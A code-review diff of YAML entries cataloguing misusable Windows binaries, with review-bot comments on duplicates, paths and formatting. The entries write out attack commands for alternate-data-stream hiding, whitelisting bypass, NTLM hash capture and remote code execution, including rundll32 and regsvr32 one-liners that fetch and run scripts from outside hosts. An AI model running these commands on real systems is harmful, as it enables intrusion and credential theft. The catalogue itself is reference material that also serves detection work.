| --- | ||||
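Review bot: renaming `PresentationHost.exe` to `Presentationhost.exe` in the Name field, the Command and both Path entries moves away from the casing the binary ships with, which the removed lines had; Windows paths are case-insensitive, but Name is the field readers and tooling key on, so keep the canonical `PresentationHost.exe` spelling. The Description change on the command only drops the trailing period, which is churn against the rest of this commit, where Descriptions keep it.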
| @@ -1,23 +1,45 @@ | ||||
| --- | ||||
| Name: Print.exe | ||||
| Description: Download, Copy, Add ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to send files to the printer | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | ||||
|     Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. | ||||
|     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
|     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
|     Usecase: Copy files | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
|     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
|     Usecase: Copy/Download file from remote server | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\print.exe | ||||
|   - C:\Windows\SysWOW64\print.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\print.exe | ||||
|   - Path: C:\Windows\SysWOW64\print.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Print.exe getting files from internet | ||||
|  - IOC: Print.exe creating executable files on disk | ||||
| Resources: | ||||
|   - https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: reg.exe | ||||
| Description: Export Reg, Add ADS, Import Reg | ||||
| Author: '' | ||||
| Name: Reg.exe | ||||
| Description: Used to manipulate the registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | ||||
|     Description: Export the target Registry key and save it to the specified .REG file. | ||||
|     Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. | ||||
|     Usecase: Hide/plant registry information in Alternate data stream for later use | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\reg.exe | ||||
|   - c:\windows\sysWOW64\reg.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\reg.exe | ||||
|   - Path: C:\Windows\SysWOW64\reg.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: reg.exe writing to an ADS | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,25 +1,39 @@ | ||||
| --- | ||||
| Name: Regasm.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Part of .NET | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regasm.exe /U AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|   - Command: regasm.exe AllTheThingsx64.dll | ||||
|   - Command: regasm.exe AllTheThingsx64.dll  | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regasm.exe AllTheThingsx64.dll  | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regasm.exe executing dll file | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
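Review bot: the `regasm.exe /U AllTheThingsx64.dll` command and its "executes the UnRegisterClass function" Description are removed, and the two entries that remain are the same command (`regasm.exe AllTheThingsx64.dll`) with the same Description and Usecase, differing only in Category (AWL bypass vs Execute); the second entry was presumably meant to be the `/U` form, so restore that command and its UnRegisterClass description rather than duplicating the RegisterClass one. Both new Command lines also carry trailing whitespace.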
| @@ -1,20 +1,36 @@ | ||||
| --- | ||||
| Name: regedit.exe | ||||
| Description: Write ADS, Read ADS, Import registry | ||||
| Author: '' | ||||
| Name: Regedit.exe | ||||
| Description: Used by Windows to manipulate registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | ||||
|     Description: Export the target Registry key to the specified .REG file. | ||||
|     Usecase: Hide registry data in alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regedit C:\ads\file.txt:regfile.reg" | ||||
|     Description: Import the target .REG file into the Registry. | ||||
|     Usecase: Import hidden registry data from alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\regedit.exe | ||||
|   - C:\Windows\SysWOW64\regedit.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regedit.exe | ||||
|   - Path: C:\Windows\SysWOW64\regedit.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regedit.exe reading and writing to alternate data stream | ||||
|  - IOC: regedit.exe should normally not be executed by end-users | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
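Review bot: the second command `regedit C:\ads\file.txt:regfile.reg"` has a stray trailing double quote, so copying the line as written passes a literal `"` as part of the path; drop it, or quote both ends as the mshta ADS command `mshta.exe "C:\ads\file.txt:file.hta"` in this commit does.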
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: Register-cimprovider.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used to register new wmi providers | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Register-cimprovider -path "C:\folder\evil.dll" | ||||
|     Description: Load the target .DLL. | ||||
|     Usecase: Execute code within dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Register-cimprovider.exe | ||||
|   - c:\windows\sysWOW64\Register-cimprovider.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Register-cimprovider.exe | ||||
|   - Path: C:\Windows\SysWOW64\Register-cimprovider.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Notes: Thanks to PhilipTsukerman - @PhilipTsukerman | ||||
|  | ||||
|   - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Acknowledgement: | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
| @@ -1,23 +1,37 @@ | ||||
| --- | ||||
| Name: Regsvcs.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regsvcs.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvcs.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
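Review bot: the Full Path block replaces the four .NET Framework locations (`C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe` through `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe`) with `C:\Windows\System32\regsvcs.exe` and `C:\Windows\SysWOW64\regsvcs.exe`, but regsvcs.exe ships under the Framework directories, not System32 or SysWOW64; the regasm file in this same commit keeps its Framework paths, and this one should too. The two Commands entries are also identical (`regsvcs.exe AllTheThingsx64.dll`, same Description and Usecase) apart from Category; one entry is enough.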
| @@ -1,22 +1,54 @@ | ||||
| --- | ||||
| Name: Regsvr32.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by Windows to register dlls | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|   - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\regsvr32.exe | ||||
|   - C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regsvr32.exe getting files from Internet | ||||
|  - IOC: regsvr32.exe executing scriptlet files | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
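Review bot: `Code Sample:` followed by `- Code:` with no value parses as a one-element list holding a null, not as an empty list; if no sample exists, keep the removed `Code Sample: []` form or give `- Code:` a real value. The two Detection IOCs are also loose for a binary this common: `regsvr32.exe getting files from Internet` is better anchored on the command line the entry itself shows, i.e. regsvr32 invoked with `/i:http` (or `/i:https`) together with `scrobj.dll`, which both listed commands share.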
| @@ -1,21 +1,36 @@ | ||||
| --- | ||||
| Name: Replace.exe | ||||
| Description: Copy, Download | ||||
| Author: '' | ||||
| Description: Used to replace file with another file  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: replace.exe C:\Source\File.cab C:\Destination /A | ||||
|     Description: Copy the specified file to the destination folder. | ||||
|     Description: Copy file.cab to destination | ||||
|     Usecase: Copy files  | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
|     Description: Copy the specified file to the destination folder. | ||||
|     Description: Download/Copy bar.exe to outdir | ||||
|     Usecase: Download file  | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\replace.exe | ||||
|   - C:\Windows\SysWOW64\replace.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\replace.exe | ||||
|   - Path: C:\Windows\SysWOW64\replace.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Replace.exe getting files from remote server | ||||
| Resources: | ||||
|   - https://twitter.com/elceef/status/986334113941655553 | ||||
|   - https://twitter.com/elceef/status/986842299861782529 | ||||
| Notes: Thanks to elceef - @elceef | ||||
|  | ||||
|   - Link: https://twitter.com/elceef/status/986334113941655553 | ||||
|   - Link: https://twitter.com/elceef/status/986842299861782529 | ||||
| Acknowledgement: | ||||
|   - Person: elceef | ||||
|     Handle: '@elceef' | ||||
| --- | ||||
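Review bot: The replacement command descriptions lose precision: `Copy file.cab to destination` and `Download/Copy bar.exe to outdir` describe the example arguments, whereas the removed `Copy the specified file to the destination folder.` described what the binary does. There is trailing whitespace on `Description: Used to replace file with another file `, `Usecase: Copy files ` and `Usecase: Download file `, and the top-level `Categories: []` is now redundant since every command carries its own `Category`.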
| @@ -1,25 +1,31 @@ | ||||
| --- | ||||
| Name: Rpcping.exe | ||||
| Description: Credentials | ||||
| Author: '' | ||||
| Description: Used to verify rpc connection | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rpcping -s 127.0.0.1 -t ncacn_np | ||||
|     Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|   - Command: rpcping -s 192.168.1.10 -ncacn_np | ||||
|     Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|   - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM | ||||
|     Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. | ||||
|     Usecase: Capture credentials on a non-standard port | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\rpcping.exe | ||||
|   - C:\Windows\SysWOW64\rpcping.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\rpcping.exe | ||||
|   - Path: C:\Windows\SysWOW64\rpcping.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/subtee/status/872797890539913216 | ||||
|   - https://github.com/vysec/RedTips | ||||
|   - https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   - https://twitter.com/vysecurity/status/873181705024266241 | ||||
| Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity | ||||
|  | ||||
|   - Link: https://github.com/vysec/RedTips | ||||
|   - Link: https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   - Link: https://twitter.com/vysecurity/status/873181705024266241 | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Vincent Yiu | ||||
|     Handle: '@vysecurity' | ||||
| --- | ||||
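Review bot: `- IOC:` under Detection is left empty; given the retained `Usecase: Capture credentials on a non-standard port`, the observable worth recording is rpcping.exe opening an outbound connection to the host and port given by its `-s` and `-e` arguments when that host is not a known RPC server. The two removed `ncacn_np` variants and the `https://twitter.com/subtee/status/872797890539913216` link are dropped without replacement while Casey Smith stays in Acknowledgement, so either restore the link or note why those commands no longer apply. Minor: `Used to verify rpc connection` should read `RPC`.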
| @@ -1,32 +1,70 @@ | ||||
| --- | ||||
| Name: Rundll32.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to execute dll files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rundll32.exe AllTheThingsx64,EntryPoint | ||||
|     Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|     Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
|     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Execute code from alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\rundll32.exe | ||||
|   - C:\Windows\SysWOW64\rundll32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\rundll32.exe | ||||
|   - Path: C:\Windows\SysWOW64\rundll32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
